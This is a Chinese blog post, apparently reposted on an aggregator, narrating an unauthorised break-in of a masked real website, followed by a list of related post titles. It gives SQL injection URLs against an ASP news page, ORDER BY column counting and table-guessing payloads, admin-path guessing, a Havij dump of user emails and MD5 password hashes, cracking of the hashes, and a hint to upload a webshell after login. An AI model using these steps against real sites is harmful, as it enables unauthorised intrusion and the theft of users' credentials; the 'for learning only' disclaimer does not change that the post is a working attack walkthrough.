记一次简单渗透之旅(一)
来源:互联网 发布:javascript offsettop 编辑:程序博客网 时间:2024/04/28 01:41
不知不觉又长了一年,曾经的我,面对红与黑向来不予置评,可骨感的现实却让人无意瞥见那一抹悲哀,让一直倔强的人啊变成了如今这幅摸样
好了闲话不多说,就将曾经第一次学渗透的时候的一个简单笔记列出来供大家分享,希望有些用处。。。
以下分享纯粹是为了学习之用,希望对有帮助的盆友不会用某些技术来做坏事。。。
----------------------------------------------------------------------------------------------------------------------------------------------
由于某些原因,网站不方便了列出,用www.××××.com代表
------------------------------------------------------------------------------------------------------------------------------------------------
大家好,我是水东流 QQ: 2875984313 (美女加,男吊丝勿扰)
第1次做教程,做的不好请见谅,
我们的QQ群:黑蚂蚁技术联盟渗透部 126931620(有兴趣加,朋友群)
好了,我们开始,,
今天的目标站:http://www.******.com
1、探测网站http://www.××××.com信息
2、打开http://www.××××.com网址
3、点击进入一个页面如:http://www.××××.com/en/news_v.asp?id=51
4、简单测试看看是否存在sql注入漏洞
http://www.××××.com/en/news_v.asp?id=51`
发现还确实存在漏洞
5、猜测相关字段比如利用order by *
http://www.××××.com/en/news_v.asp?id=51%20order%20by%206
。。。
http:/www.××××.com/en/news_v.asp?id=51%20order%20by%207等等
结果发现:http://www.××××.com/en/news_v.asp?id=51%20order%20by%206显示正常
。。。
http://www.××××.com/en/news_v.asp?id=51%20order%20by%207显示错误
由此可知access表一共有6个字段,下面就可以来猜测账号、密码字段
6、利用and 0<>(select count(*) from admin)猜测是否存在admin这张表
结果不行了,似乎有点问题。。。
继续寻找方法
根据以往的经验,后台一般是网站后面跟着/admin、/manage等常见的后台目录,这里测试一下
7、构造地址:http://www.××××.com/admin 并且打开
结果显示错误404
将admin换成robots.txt试一试,结果还是不行
考虑到现在很多管理人员都将都有安全意识,然后有些人又喜欢自作聪明的仅仅
只是在admin前面加上web前缀,所以试一试webadmin看看行不行
哎呀,行了!
8、登陆网站后台http://www.××××.com/webadmin/login.asp,猜测账号以及密码
很显然后台登陆界面写的很差,连个基本的验证码都没有,但也不能就说它的程序写得差。
好了进入正题:
由于没有猜到正确的账号和密码,那么先可以查看它对应的源码来试试运气,希望可以成功。
发现右键功能被屏蔽。用菜单的查看-查看源码功能。
发现input name=userid id-----userID validator---uid
id--------userPassword validator------password
利用6中的and 0<>(select count(*) from userID) 进行测试
没发现
转而利用:and 1=2 and exists(select * from admin)试试运气
将admin换成manager、tabmanager、userID、user等等都没有发现
虽然没有找到,但是在改成user的时候网页显示的信息结果与其他的都不一样的,可能是做了
相关的处理,具体不知。。。。0.0。。。。
所以接下来就是用相关的注入工具进行相关的测试工作。。
9、使用sql注入工具havij试试
操作不多少,相当简单,直接输入注入网址就行了。
结果发现相关DBs信息情况:
------------------------------------------------------------
DBS:MsAccess
------------------------------------------------------------
Tables:user
-------------------------
Columns:email
password
username
id
-------------------------
Datas:
××××@htomail.com 827ccb0eea8a706c4c34a16891f84e7b ××××× 1
......
--------------------------------------------------------------
相关扫描的数据结果如下;
Data Found: email=××××××@hotmail.com
Data Found: password=827ccb0eea8a706c4c34a16891f84e7b
Data Found: username=××××
Data Found: id=1
Data Found: email=××××××××@yahoo.com
Data Found: password=d3af9e9ab49a6d3f8e7e9ec03902402a
Data Found: username=×××××××
Data Found: id=10
Data Found: email=xx×××@sina.com
Data Found: password=5ce6308eae951da74d27580bd23e7ca4
Data Found: username=xx×××××××
Data Found: id=11
Data Found: email=××××××××@sina.com
Data Found: password=827ccb0eea8a706c4c34a16891f84e7b
Data Found: username=××××××××
Data Found: id=12
Data Found: email=×××××××@163.com
Data Found: password=354fadaddfc4c03f3ee294d299381113
Data Found: username=××××××××
------------------------------------------------------------------
虽然上一步中改成user的探测没有成功但是可以肯定的是数据库中确实是有user表的。
10、接下来就是对于md5值进行相关解密,查询网址:http://www.cmd5.com/
id=1
username=××××
password=827ccb0eea8a706c4c34a16891f84e7b -----解密后-----12345
id=11
username=×××××
password=5ce6308eae951da74d27580bd23e7ca4 -----解密后-----xxb380
后面的就不进行解密了,知道怎么解密就行......
上面数据只是部分而已,邮箱以及账号部分都做了处理。。。。
11、重新尝试步骤8,登陆操作,验证账号密码是否可行
12、如果登录成功,上传什么马就看大家自己的意愿了。。。。
如果不成功,可能是由某些原因但是一般的得到账号密码的简单步骤也就。。。。。
- 记一次简单渗透之旅(一)
- 记一次简单的渗透测试经过
- 记一次渗透测试
- 小白日记33:kali渗透测试之Web渗透-扫描工具-Burpsuite(一)
- 对武汉大学的一次简单渗透
- 渗透测试之Nmap命令(一)
- 渗透测试之Nmap命令(一)
- 记一次内网渗透
- 记一次驴唇不对马嘴的DIY之旅(一)
- 小白日记35:kali渗透测试之Web渗透-手动漏洞挖掘(一)-默认安装引发的漏洞
- 一次简单的渗透测试(旁站-动易V8.2-提权)
- 一次真实的入侵-------记对一足球推荐站点的渗透
- 一次对某韩国网站渗透记
- 记一次曲折的渗透测试经历
- 小白日记2:kali渗透测试之被动信息收集(一)
- 小白日记21:kali渗透测试之提权(一)--本地提权
- 对某市政府内部网的一次简单渗透
- 对安徽省高等学院计算机教育研究会的一次简单渗透。
- 【转android】(ListView、GridView等)通用的下拉刷新、上拉自动加载的组件
- 【LeetCode】【Python题解】Pascal's Triangle
- Unity Assetsboundle 资源下载与更新
- 仿微信打飞机小游戏GamePlane(1)----概述
- 轻松调整C盘分区大小 EaseUS Partition Master 扩展C盘分区大小,已经验证 网上转载
- 记一次简单渗透之旅(一)
- code[vs] - 1205 单词翻转 - 字符串
- uva10670
- VMware下 Ubuntu共享文件夹下 看不到物理机的内容
- MFC单文档结构,实现OpenGL的绘图,移动,旋转,缩放
- PAT Advanced Level 1002. A+B for Polynomials (25)(Java)
- Yale开放课程博弈论14
- 5.7多态:
- 每天一个linux命令:kill命令